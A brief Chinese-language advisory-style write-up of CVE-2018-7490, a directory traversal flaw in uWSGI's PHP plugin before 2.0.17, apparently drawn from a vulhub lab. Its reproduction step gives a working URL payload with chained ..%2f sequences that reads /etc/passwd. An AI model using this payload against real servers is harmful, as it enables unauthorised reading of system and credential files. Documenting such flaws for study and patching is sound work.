（CVE-2018-7490）uWSGI PHP目录穿越漏洞

一、漏洞简介

uWSGI是一款Web应用程序服务器，它实现了WSGI、uwsgi和http等协议，并支持通过插件来运行各种语言。

uWSGI 2.0.17之前的PHP插件，没有正确的处理DOCUMENT_ROOT检测，导致用户可以通过..%2f来跨越目录，读取或运行DOCUMENT_ROOT目录以外的文件。

二、漏洞影响

uWSGI \< 2.0.17

三、复现过程

访问http://www.0-sec.org:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd，成功读取文件：

参考链接

https://github.com/vulhub/vulhub/blob/master/uwsgi/CVE-2018-7490/README.zh-cn.md